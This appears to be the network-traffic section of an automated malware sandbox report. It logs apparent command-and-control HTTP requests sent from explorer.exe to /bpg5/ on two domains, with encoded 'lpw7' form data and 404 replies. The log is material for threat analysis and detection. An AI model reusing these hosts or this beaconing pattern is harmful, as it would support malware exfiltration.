                                                  May 25, 2023 11:37:24.255784988 CEST295INData Raw: a4 bf a5 da a1 bc a5 b8 a4 cf b8 ab a4 c4 a4 ab a4 ea a4 de a4 bb a4 f3 a4 c7 a4 b7 a4 bf a1 a3 3c 2f 68 32 3e 0a 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 65 78 70 6c 61 69 6e 22 3e a4 b3 a4 ce a5 a8 a5 e9 a1 bc a4 cf a1 a2 bb d8 c4 ea a4 b7 a4
                                                  Data Ascii: </h2> <p class="explain"></p> <h3></h3> <div id="white_box"> <div id="cause"> <ul>


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  16192.168.2.449716104.194.229.19880C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  May 25, 2023 11:37:30.040780067 CEST298OUTPOST /bpg5/ HTTP/1.1
                                                  Host: www.vns96.net
                                                  Connection: close
                                                  Content-Length: 1482
                                                  Cache-Control: no-cache
                                                  Origin: http://www.vns96.net
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://www.vns96.net/bpg5/
                                                  Accept-Language: en-US
                                                  Accept-Encoding: gzip, deflate
                                                  Data Raw: 6c 70 77 37 3d 53 56 30 73 59 78 4f 65 4a 58 4f 5a 4b 4c 6f 52 6d 34 76 67 41 74 52 75 47 74 41 65 58 7a 47 70 47 65 63 64 39 56 4c 5f 69 4f 71 74 7a 48 39 36 38 45 77 57 6e 56 6e 36 5a 70 41 4b 63 50 53 31 34 30 66 34 34 71 67 63 50 4d 42 37 6d 30 64 78 4b 52 48 55 6a 78 33 69 64 43 77 75 36 5f 68 33 7e 41 44 5f 31 38 48 35 4e 36 5a 6c 75 52 53 76 72 2d 4d 4b 44 66 49 41 54 6a 75 49 74 6a 4e 43 44 2d 56 31 51 5a 61 43 58 4a 7e 78 71 67 54 6f 76 48 4f 71 61 66 79 61 43 44 28 74 44 72 6b 31 39 37 6f 44 6f 51 64 68 41 72 53 4c 68 6b 72 49 7e 30 74 2d 50 31 6d 35 5a 37 53 7a 7e 39 39 32 66 35 70 6a 67 75 64 73 63 48 6d 67 5a 6e 7e 57 42 6c 58 67 79 44 66 41 37 54 7e 43 7e 64 48 61 33 39 7e 4d 47 35 39 47 33 5f 58 64 59 69 74 49 6b 32 73 71 6c 4d 38 38 31 66 4d 56 4f 52 79 59 36 6b 30 6c 50 5a 59 75 6d 56 65 6e 30 77 35 30 6f 6c 54 6c 70 7a 64 55 4d 75 79 6b 52 43 34 4f 6f 48 72 53 31 72 4e 62 58 62 46 49 48 7a 62 6c 72 79 76 73 78 6f 63 68 37 73 37 6b 52 2d 35 50 71 65 74 6f 6d 62 4b 54 4a 6b 72 37 45 62 4e 74 36 69 49 50 49 71 4a 75 42 38 5a 30 35 49 51 74 57 61 32 41 58 56 39 52 6f 77 6a 2d 69 53 64 37 45 55 56 4b 7e 41 65 56 44 75 44 6b 72 32 6b 68 75 70 4c 6b 4e 74 70 65 57 49 31 45 38 35 4c 5f 7a 71 6a 52 6a 6a 68 67 61 74 67 2d 48 6c 78 30 70 41 33 68 38 56 31 78 6c 55 62 2d 6e 33 46 51 74 63 47 5a 4b 31 6e 67 71 4c 7a 36 38 62 67 63 6e 31 53 47 30 57 41 43 6c 70 31 6c 37 55 37 50 68 4d 77 6c 51 34 65 4e 6f 77 4f 2d 4c 32 28 39 49 51 74 61 51 39 7a 47 75 47 4c 79 43 77 47 4d 35 44 31 6c 63 54 44 30 4d 39 55 6d 5a 49 41 69 28 46 57 67 51 31 76 6e 6f 52 72 43 38 59 77 6e 6b 52 38 38 74 30 62 36 59 41 64 77 4c 5f 37 49 30 57 72 47 7e 65 52 50 49 57 49 43 79 45 62 78 68 34 74 2d 4a 57 7e 47 67 75 78 6c 51 6a 35 73 71 45 39 4b 69 35 64 76 50 2d 77 53 6d 4c 63 4e 73 4a 74 4c 43 6e 61 50 57 58 33 45 63 55 71 64 34 38 64 6d 4c 61 45 76 62 79 79 6c 54 39 4c 46 47 50 51 38 32 50 73 6a 46 5a 54 57 55 71 58 72 28 32 76 35 62 6a 78 56 74 51 65 4c 64 4d 68 4e 6d 76 37 51 6e 39 79 67 4f 53 4f 54 4e 4e 4f 4e 6a 41 7e 4b 71 55 58 48 32 64 6c 76 67 75 69 6b 53 48 6b 66 4a 70 5a 54 76 51 36 73 6a 31 43 42 63 2d 70 66 71 51 71 4b 61 52 4a 57 31 4e 43 74 54 42 74 61 47 51 28 36 6f 6e 75 31 61 61 57 6e 34 4a 4f 39 35 4e 69 58 50 73 6b 67 4d 63 71 58 6f 71 56 68 53 62 73 5a 46 4a 7a 64 4c 61 48 50 56 55 6f 32 77 69 66 43 54 49 55 70 68 37 4f 37 66 43 66 70 79 6a 51 6f 4f 42 76 30 4c 31 35 55 75 36 58 52 68 4f 6f 45 4a 38 31 78 46 37 57 53 70 6d 58 58 53 72 51 51 51 64 64 4b 68 62 51 41 71 36 5a 4e 67 2d 54 6f 74 7a 64 4e 42 61 4e 4e 43 4a 73 69 72 63 37 50 65 2d 5a 67 6d 4f 69 5f 59 61 54 73 51 72 61 72 4c 4e 66 36 28 31 43 65 39 6e 33 67 67 72 66 34 6f 6d 33 65 77 34 7a 4f 48 73 6b 39 41 59 41 4f 51 2d 7e 47 6e 71 73 42 45 4e 4f 67 76 2d 28 35 7a 48 76 73 35 61 54 41 66 62 43 31 43 59 63 4a 79 4e 36 63 70 31 75 67 43 57 43 37 78 73 63 45 68 5f 28 55 65 57 66 41 62 52 51 50 47 6d 68 44 36 54 53 77 7e 4b 57 6c 6d 52 39 68 36 73 79 47 48 75 30 36 5a 58 47 74 74 4e 5a 48 6a 73 68 45 54 4a 5a 38 67 54 6f 72 67 33 4f 6d 59 6b 35 48 67 6f 79 67 38 37 6e 66 6b 4c 28 49 65 59 34 7a 38 63 67 38 63 33 28 75 73 67 38 78 73 61 6b 78 45 65 77 6e 55 64 34 50 4a 72 78 67 54 48 6c 58 66 71 42 49 73 7a 66 51 7e 41 50 43 54 42 34 67 7a 61 5a 37 68 6f 36 44 50 76 70 48 62 5f 67 75 4b 4e 6a 5f 49 58 56 47 63 72 6c 62 4f 72 31 67 4e 7a 46 48 47 64 37 78 71 76 76 44 33 4d 4d 71 4b 72 77 65 57 6d 31 30 35 68 73 37 59 47 39 4c 59 53 4d 50 4a 49 58 2d 70 38 6d 67 46 30 30 54 42 6d 4a 79 56 68 44 6c 6f 4d 47 72 36 39 7e 37 39 2d 59 32 51 52 7a 34 4a 66 35 49 43 5a 65 4e 39 37 28 38 53 6b 72 4c 6d 6a 30 6a 53 72 6f 62 37 58 46 6e 6b 43 4b 78 54 31 6a 66 78 59 37 63 6a 4d 54 52 68 4c 77 73 77 38 39 55 45 78 58 59 32 6d 45 47 42 53 31 79 39 4c 6d 51 6b 67 68 7a 70 49 70 4f 4e 38 66 5a 52 76 66 33 77 36 54 42 4a 52 4f 61 28 65 45 38 31 62 59 7a 6a 31 42 55 53 36 57 70 32 4f 4e 67 41 58 34 7a 74 32 64 75 52 69 35 46 37 5a 55 58 4f 53 6b 48 62 50 79 48 5a 47 33 69 78 78 57 5f 32 2d 50 48 70 55 4e 64 7a 66 38 42 28 54 4e 44 47 75 7e 42 33 73 55 69 63 57 62 70 73 6f
                                                  Data Ascii: lpw7=SV0sYxOeJXOZKLoRm4vgAtRuGtAeXzGpGecd9VL_iOqtzH968EwWnVn6ZpAKcPS140f44qgcPMB7m0dxKRHUjx3idCwu6_h3~AD_18H5N6ZluRSvr-MKDfIATjuItjNCD-V1QZaCXJ~xqgTovHOqafyaCD(tDrk197oDoQdhArSLhkrI~0t-P1m5Z7Sz~992f5pjgudscHmgZn~WBlXgyDfA7T~C~dHa39~MG59G3_XdYitIk2sqlM881fMVORyY6k0lPZYumVen0w50olTlpzdUMuykRC4OoHrS1rNbXbFIHzblryvsxoch7s7kR-5PqetombKTJkr7EbNt6iIPIqJuB8Z05IQtWa2AXV9Rowj-iSd7EUVK~AeVDuDkr2khupLkNtpeWI1E85L_zqjRjjhgatg-Hlx0pA3h8V1xlUb-n3FQtcGZK1ngqLz68bgcn1SG0WAClp1l7U7PhMwlQ4eNowO-L2(9IQtaQ9zGuGLyCwGM5D1lcTD0M9UmZIAi(FWgQ1vnoRrC8YwnkR88t0b6YAdwL_7I0WrG~eRPIWICyEbxh4t-JW~GguxlQj5sqE9Ki5dvP-wSmLcNsJtLCnaPWX3EcUqd48dmLaEvbyylT9LFGPQ82PsjFZTWUqXr(2v5bjxVtQeLdMhNmv7Qn9ygOSOTNNONjA~KqUXH2dlvguikSHkfJpZTvQ6sj1CBc-pfqQqKaRJW1NCtTBtaGQ(6onu1aaWn4JO95NiXPskgMcqXoqVhSbsZFJzdLaHPVUo2wifCTIUph7O7fCfpyjQoOBv0L15Uu6XRhOoEJ81xF7WSpmXXSrQQQddKhbQAq6ZNg-TotzdNBaNNCJsirc7Pe-ZgmOi_YaTsQrarLNf6(1Ce9n3ggrf4om3ew4zOHsk9AYAOQ-~GnqsBENOgv-(5zHvs5aTAfbC1CYcJyN6cp1ugCWC7xscEh_(UeWfAbRQPGmhD6TSw~KWlmR9h6syGHu06ZXGttNZHjshETJZ8gTorg3OmYk5Hgoyg87nfkL(IeY4z8cg8c3(usg8xsakxEewnUd4PJrxgTHlXfqBIszfQ~APCTB4gzaZ7ho6DPvpHb_guKNj_IXVGcrlbOr1gNzFHGd7xqvvD3MMqKrweWm105hs7YG9LYSMPJIX-p8mgF00TBmJyVhDloMGr69~79-Y2QRz4Jf5ICZeN97(8SkrLmj0jSrob7XFnkCKxT1jfxY7cjMTRhLwsw89UExXY2mEGBS1y9LmQkghzpIpON8fZRvf3w6TBJROa(eE81bYzj1BUS6Wp2ONgAX4zt2duRi5F7ZUXOSkHbPyHZG3ixxW_2-PHpUNdzf8B(TNDGu~B3sUicWbpsoAjGHO0gea9ocdpQnvL8Zz3l8X3fvEgFGkKHlfcYORjIfkRJg2eBz8wc095dv7eUk7Pj51yPJcCWVdE4nuGFbtloA3rQBoYFcKmlgSzecLc3e1KG3kSbg).
                                                  May 25, 2023 11:37:30.214983940 CEST298INHTTP/1.1 404 Not Found
                                                  Server: nginx
                                                  Date: Thu, 25 May 2023 09:52:52 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 146
                                                  Connection: close
                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  17192.168.2.449717104.194.229.19880C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  May 25, 2023 11:37:32.738305092 CEST299OUTPOST /bpg5/ HTTP/1.1
                                                  Host: www.vns96.net
                                                  Connection: close
                                                  Content-Length: 186
                                                  Cache-Control: no-cache
                                                  Origin: http://www.vns96.net
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://www.vns96.net/bpg5/
                                                  Accept-Language: en-US
                                                  Accept-Encoding: gzip, deflate
                                                  Data Raw: 6c 70 77 37 3d 53 56 30 73 59 78 4f 65 4a 58 4f 5a 4b 49 77 52 6e 70 76 67 53 64 52 75 48 74 41 65 42 44 47 76 47 5a 56 6f 39 55 65 34 6a 35 57 74 77 53 5a 36 38 78 63 57 6b 56 6e 37 54 4a 41 4f 59 50 53 67 34 30 66 53 34 71 4d 63 50 4d 46 37 6e 52 5a 78 4d 56 7a 4c 71 68 33 67 46 79 77 2d 36 5f 6b 58 7e 41 66 76 31 38 76 35 4e 34 39 6c 38 42 43 76 75 63 6b 4b 49 50 4a 46 43 54 75 66 74 6a 41 61 44 2d 46 48 51 63 65 43 58 37 4b 78 72 31 6e 6f 71 52 47 71 51 5f 79 58 50 6a 7e 78 49 75 4e 53 78 36 46 7a 72 52 74 53 5a 37 69 5a 70 31 4f 48 6c 41 29 2e 00 00 00 00 00 00 00 00
                                                  Data Ascii: lpw7=SV0sYxOeJXOZKIwRnpvgSdRuHtAeBDGvGZVo9Ue4j5WtwSZ68xcWkVn7TJAOYPSg40fS4qMcPMF7nRZxMVzLqh3gFyw-6_kX~Afv18v5N49l8BCvuckKIPJFCTuftjAaD-FHQceCX7Kxr1noqRGqQ_yXPj~xIuNSx6FzrRtSZ7iZp1OHlA).
                                                  May 25, 2023 11:37:32.912173986 CEST300INHTTP/1.1 404 Not Found
                                                  Server: nginx
                                                  Date: Thu, 25 May 2023 09:52:54 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 146
                                                  Connection: close
                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  18192.168.2.449718104.194.229.19880C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  May 25, 2023 11:37:35.440207958 CEST300OUTGET /bpg5/?lpw7=fXcMbGDjExj3drMKkufBQsBzHfQKFTmLB4JM93eT0riZ5SFz+kUtiUeQeK0rTvuj3gbHhqJGCt4vmHgIT135jm/4dwFi2a8Vxg==&UZCu=zJfEuRXw-P HTTP/1.1
                                                  Host: www.vns96.net
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  May 25, 2023 11:37:35.614077091 CEST301INHTTP/1.1 404 Not Found
                                                  Server: nginx
                                                  Date: Thu, 25 May 2023 09:52:57 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 146
                                                  Connection: close
                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  19192.168.2.449719185.134.245.11380C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  May 25, 2023 11:37:40.737534046 CEST303OUTPOST /bpg5/ HTTP/1.1
                                                  Host: www.thetowerbells.com
                                                  Connection: close
                                                  Content-Length: 1482
                                                  Cache-Control: no-cache
                                                  Origin: http://www.thetowerbells.com
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://www.thetowerbells.com/bpg5/
                                                  Accept-Language: en-US
                                                  Accept-Encoding: gzip, deflate
                                                  Data Raw: 6c 70 77 37 3d 61 74 58 4f 71 70 4e 33 79 4b 36 6d 4a 69 6a 78 65 32 68 4e 7a 75 53 37 55 4d 79 67 7e 30 46 54 62 58 37 6e 6b 56 43 46 56 34 32 76 52 52 79 48 34 44 79 76 44 69 65 6a 63 6c 36 38 73 70 73 4e 73 48 69 42 46 59 56 55 71 65 35 59 46 32 50 73 47 35 7e 34 49 39 36 70 31 64 64 33 54 79 57 7a 64 64 7e 72 50 39 5a 51 46 41 53 4d 57 4f 35 71 55 43 48 55 50 6b 47 7a 75 7a 4c 6d 73 2d 75 50 44 41 30 66 4d 57 58 66 39 7a 70 72 62 46 68 59 5a 31 62 45 53 32 6c 69 65 47 38 59 70 6b 4f 64 59 34 42 63 55 78 7e 4e 50 76 4c 6a 6b 65 46 6a 55 74 6f 42 6d 44 51 37 6b 58 67 5f 64 73 28 62 4a 32 51 42 42 63 48 57 53 38 65 78 35 37 67 54 66 59 50 54 34 7a 41 43 55 45 4c 6e 5a 57 66 45 75 75 44 2d 4c 69 57 2d 34 39 7e 4a 45 47 71 6c 49 34 6b 47 79 6d 47 76 44 32 4d 69 6a 70 66 65 67 54 68 6e 46 69 58 56 43 54 4a 49 30 66 4c 5f 6b 4a 4a 52 37 57 68 58 42 61 4b 67 72 44 61 72 75 6b 4c 39 46 78 37 66 73 45 49 54 67 32 63 55 36 55 33 4b 47 39 36 5f 70 77 68 36 59 4e 68 5a 38 69 6d 7a 67 5f 50 44 5a 6e 77 71 4e 55 36 2d 78 4d 52 4a 4b 66 5a 72 78 6a 6d 5a 54 6d 35 71 36 41 4f 46 39 55 41 36 4f 73 4e 4b 41 4e 37 6a 75 5a 53 67 6e 73 46 4c 76 39 61 46 53 76 63 73 71 55 6c 41 30 30 35 6a 34 43 28 44 66 72 64 51 54 37 59 44 59 45 38 41 66 35 64 35 7a 62 77 30 68 46 54 77 37 5a 31 36 4a 4c 44 68 74 6b 46 77 41 4c 72 4f 72 45 4e 32 59 41 58 35 45 41 79 50 35 52 72 44 7a 35 64 70 44 67 38 6b 49 6a 5a 71 28 68 65 33 6b 4d 45 78 59 4d 64 59 74 30 47 41 54 75 7a 5a 74 61 4b 4b 57 33 41 69 4b 35 70 56 62 59 63 64 41 30 34 78 61 77 31 6d 70 7a 45 45 4b 2d 4a 68 39 41 78 6f 71 45 5a 6b 79 7a 4d 72 6a 73 44 6e 76 37 39 4d 5a 73 41 5f 6a 77 59 36 48 58 62 76 75 5a 6b 54 58 48 62 4d 34 33 56 5a 77 6f 33 2d 51 54 75 78 7a 36 4e 44 32 67 4b 57 77 53 6a 45 6e 35 34 59 55 63 53 49 68 57 4d 2d 5a 69 54 77 78 66 75 64 73 5a 4f 67 73 6d 70 75 62 65 65 6b 4d 61 6d 2d 4c 32 77 54 67 76 54 35 66 43 50 41 35 53 34 61 4e 50 33 4a 55 58 4e 41 6b 32 36 45 30 46 71 48 6d 62 43 31 66 69 58 6e 69 59 32 62 6a 36 50 41 42 5f 61 47 62 38 48 6a 64 38 70 73 64 34 69 4e 43 74 62 78 66 41 74 49 64 59 62 6e 35 42 55 38 77 6b 55 35 6b 57 52 4b 4f 6c 78 5a 28 58 39 59 56 4d 6d 35 30 79 76 4e 4a 37 41 2d 68 50 71 62 67 59 4f 64 28 75 52 70 61 31 61 50 78 68 4e 77 28 30 63 2d 28 49 6c 55 69 54 58 5f 49 72 6f 45 42 2d 49 79 45 59 4d 71 4a 38 62 49 78 33 33 70 31 33 4e 59 61 67 47 4f 51 6f 48 66 79 33 35 36 57 34 56 31 37 33 41 31 65 5a 53 6f 37 4f 53 64 4a 46 53 42 43 49 66 72 41 63 54 32 61 43 58 6c 33 67 32 59 4e 74 55 4c 6b 38 28 33 48 52 69 74 63 68 67 76 7a 51 34 30 44 4b 58 4d 69 75 52 55 68 35 66 36 53 71 61 54 68 58 45 6e 72 61 72 4c 42 78 41 67 30 41 72 58 66 48 70 43 5a 6c 53 73 33 6c 7a 38 43 68 72 5f 63 44 69 53 30 53 47 53 6b 68 7e 53 6d 79 62 51 4a 38 4f 33 38 72 6b 74 4a 56 75 68 7e 66 6d 4a 44 36 73 47 79 6b 34 50 77 47 78 69 79 42 67 65 44 33 33 5f 68 58 72 45 39 79 4e 48 7a 55 61 4e 6c 35 78 46 45 57 4d 70 38 74 52 4c 74 68 38 62 77 55 6f 5a 72 4b 32 61 49 57 4f 68 5a 53 47 35 38 58 4d 33 4c 79 6e 48 76 6d 38 31 76 65 48 77 67 56 6e 4f 39 5f 6f 79 6d 73 56 37 73 59 5a 46 6d 44 75 75 6f 46 6e 6d 4f 73 64 6d 35 74 45 72 56 73 33 45 41 67 41 50 46 76 51 38 55 70 50 77 66 6b 35 62 7e 46 6b 39 4c 74 55 31 32 73 35 6b 6f 52 4e 70 58 61 73 38 6c 34 6d 50 65 57 4c 69 71 62 75 54 54 52 62 5f 43 6e 31 77 6b 58 6c 63 35 6c 38 4d 6a 67 52 62 73 4a 30 35 50 61 64 71 69 5a 41 6c 61 2d 4e 68 41 4d 66 41 7a 76 4d 37 4b 44 7e 75 69 69 36 74 6d 59 75 63 72 51 39 49 52 61 78 33 51 4b 67 49 58 34 52 37 71 35 49 78 5a 44 72 70 38 69 52 61 6e 6f 65 51 62 70 68 34 35 38 72 46 4f 4b 28 56 43 43 36 57 4f 30 63 6e 4d 77 50 51 66 44 50 54 56 6e 63 53 53 5f 56 7a 68 76 72 2d 54 57 4e 6a 79 65 72 43 37 42 48 46 73 46 67 61 37 42 66 50 4f 64 4b 38 64 68 48 71 59 30 37 62 75 71 32 43 77 6d 75 61 36 49 6b 37 28 58 38 57 6e 45 35 73 63 77 72 64 33 49 58 75 31 63 4a 4a 79 74 39 4e 59 67 44 31 4a 53 69 4d 39 4b 4a 67 61 39 46 43 6c 42 51 4f 56 5f 58 65 77 72 44 61 6c 46 48 67 6a 35 35 69 39 4c 69 36 47 49 50 6a 76 38 75 73 76 36 38 66 4e 53 50 38 79 37 57 65 32 4b 36 6f 39 73 34 70 72 78
                                                  Data Ascii: lpw7=atXOqpN3yK6mJijxe2hNzuS7UMyg~0FTbX7nkVCFV42vRRyH4DyvDiejcl68spsNsHiBFYVUqe5YF2PsG5~4I96p1dd3TyWzdd~rP9ZQFASMWO5qUCHUPkGzuzLms-uPDA0fMWXf9zprbFhYZ1bES2lieG8YpkOdY4BcUx~NPvLjkeFjUtoBmDQ7kXg_ds(bJ2QBBcHWS8ex57gTfYPT4zACUELnZWfEuuD-LiW-49~JEGqlI4kGymGvD2MijpfegThnFiXVCTJI0fL_kJJR7WhXBaKgrDarukL9Fx7fsEITg2cU6U3KG96_pwh6YNhZ8imzg_PDZnwqNU6-xMRJKfZrxjmZTm5q6AOF9UA6OsNKAN7juZSgnsFLv9aFSvcsqUlA005j4C(DfrdQT7YDYE8Af5d5zbw0hFTw7Z16JLDhtkFwALrOrEN2YAX5EAyP5RrDz5dpDg8kIjZq(he3kMExYMdYt0GATuzZtaKKW3AiK5pVbYcdA04xaw1mpzEEK-Jh9AxoqEZkyzMrjsDnv79MZsA_jwY6HXbvuZkTXHbM43VZwo3-QTuxz6ND2gKWwSjEn54YUcSIhWM-ZiTwxfudsZOgsmpubeekMam-L2wTgvT5fCPA5S4aNP3JUXNAk26E0FqHmbC1fiXniY2bj6PAB_aGb8Hjd8psd4iNCtbxfAtIdYbn5BU8wkU5kWRKOlxZ(X9YVMm50yvNJ7A-hPqbgYOd(uRpa1aPxhNw(0c-(IlUiTX_IroEB-IyEYMqJ8bIx33p13NYagGOQoHfy356W4V173A1eZSo7OSdJFSBCIfrAcT2aCXl3g2YNtULk8(3HRitchgvzQ40DKXMiuRUh5f6SqaThXEnrarLBxAg0ArXfHpCZlSs3lz8Chr_cDiS0SGSkh~SmybQJ8O38rktJVuh~fmJD6sGyk4PwGxiyBgeD33_hXrE9yNHzUaNl5xFEWMp8tRLth8bwUoZrK2aIWOhZSG58XM3LynHvm81veHwgVnO9_oymsV7sYZFmDuuoFnmOsdm5tErVs3EAgAPFvQ8UpPwfk5b~Fk9LtU12s5koRNpXas8l4mPeWLiqbuTTRb_Cn1wkXlc5l8MjgRbsJ05PadqiZAla-NhAMfAzvM7KD~uii6tmYucrQ9IRax3QKgIX4R7q5IxZDrp8iRanoeQbph458rFOK(VCC6WO0cnMwPQfDPTVncSS_Vzhvr-TWNjyerC7BHFsFga7BfPOdK8dhHqY07buq2Cwmua6Ik7(X8WnE5scwrd3IXu1cJJyt9NYgD1JSiM9KJga9FClBQOV_XewrDalFHgj55i9Li6GIPjv8usv68fNSP8y7We2K6o9s4prx7uSi0FpSuaIU(Z9LrZQ2C6MVzbRCQXN5OLmXhlLwm6OXW3wwwiChhnAYho5zXQ2Iabj_Aeo-GTxy(afQsGkcUeLWiZle5mMcNryfSd587UBsORCwY8mA).
                                                  May 25, 2023 11:37:40.828305006 CEST304OUTData Raw: 48 57 53 38 65 78 35 37 67 54 66 59 50 54 34 7a 41 43 55 45 4c 6e 5a 57 66 45 75 75 44 2d 4c 69 57 2d 34 39 7e 4a 45 47 71 6c 49 34 6b 47 79 6d 47 76 44 32 4d 69 6a 70 66 65 67 54 68 6e 46 69 58 56 43 54 4a 49 30 66 4c 5f 6b 4a 4a 52 37 57 68 58
                                                  Data Ascii: HWS8ex57gTfYPT4zACUELnZWfEuuD-LiW-49~JEGqlI4kGymGvD2MijpfegThnFiXVCTJI0fL_kJJR7WhXBaKgrDarukL9Fx7fsEITg2cU6U3KG96_pwh6YNhZ8imzg_PDZnwqNU6-xMRJKfZrxjmZTm5q6AOF9UA6OsNKAN7juZSgnsFLv9aFSvcsqUlA005j4C(DfrdQT7YDYE8Af5d5zbw0hFTw7Z16JLDhtkFwALrOrEN2Y
                                                  May 25, 2023 11:37:41.140798092 CEST306OUTPOST /bpg5/ HTTP/1.1
                                                  Host: www.thetowerbells.com
                                                  Connection: close
                                                  Content-Length: 1482
                                                  Cache-Control: no-cache
                                                  Origin: http://www.thetowerbells.com
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://www.thetowerbells.com/bpg5/
                                                  Accept-Language: en-US
                                                  Accept-Encoding: gzip, deflate
                                                  Data Raw: 6c 70 77 37 3d 61 74 58 4f 71 70 4e 33 79 4b 36 6d 4a 69 6a 78 65 32 68 4e 7a 75 53 37 55 4d 79 67 7e 30 46 54 62 58 37 6e 6b 56 43 46 56 34 32 76 52 52 79 48 34 44 79 76 44 69 65 6a 63 6c 36 38 73 70 73 4e 73 48 69 42 46 59 56 55 71 65 35 59 46 32 50 73 47 35 7e 34 49 39 36 70 31 64 64 33 54 79 57 7a 64 64 7e 72 50 39 5a 51 46 41 53 4d 57 4f 35 71 55 43 48 55 50 6b 47 7a 75 7a 4c 6d 73 2d 75 50 44 41 30 66 4d 57 58 66 39 7a 70 72 62 46 68 59 5a 31 62 45 53 32 6c 69 65 47 38 59 70 6b 4f 64 59 34 42 63 55 78 7e 4e 50 76 4c 6a 6b 65 46 6a 55 74 6f 42 6d 44 51 37 6b 58 67 5f 64 73 28 62 4a 32 51 42 42 63 48 57 53 38 65 78 35 37 67 54 66 59 50 54 34 7a 41 43 55 45 4c 6e 5a 57 66 45 75 75 44 2d 4c 69 57 2d 34 39 7e 4a 45 47 71 6c 49 34 6b 47 79 6d 47 76 44 32 4d 69 6a 70 66 65 67 54 68 6e 46 69 58 56 43 54 4a 49 30 66 4c 5f 6b 4a 4a 52 37 57 68 58 42 61 4b 67 72 44 61 72 75 6b 4c 39 46 78 37 66 73 45 49 54 67 32 63 55 36 55 33 4b 47 39 36 5f 70 77 68 36 59 4e 68 5a 38 69 6d 7a 67 5f 50 44 5a 6e 77 71 4e 55 36 2d 78 4d 52 4a 4b 66 5a 72 78 6a 6d 5a 54 6d 35 71 36 41 4f 46 39 55 41 36 4f 73 4e 4b 41 4e 37 6a 75 5a 53 67 6e 73 46 4c 76 39 61 46 53 76 63 73 71 55 6c 41 30 30 35 6a 34 43 28 44 66 72 64 51 54 37 59 44 59 45 38 41 66 35 64 35 7a 62 77 30 68 46 54 77 37 5a 31 36 4a 4c 44 68 74 6b 46 77 41 4c 72 4f 72 45 4e 32 59 41 58 35 45 41 79 50 35 52 72 44 7a 35 64 70 44 67 38 6b 49 6a 5a 71 28 68 65 33 6b 4d 45 78 59 4d 64 59 74 30 47 41 54 75 7a 5a 74 61 4b 4b 57 33 41 69 4b 35 70 56 62 59 63 64 41 30 34 78 61 77 31 6d 70 7a 45 45 4b 2d 4a 68 39 41 78 6f 71 45 5a 6b 79 7a 4d 72 6a 73 44 6e 76 37 39 4d 5a 73 41 5f 6a 77 59 36 48 58 62 76 75 5a 6b 54 58 48 62 4d 34 33 56 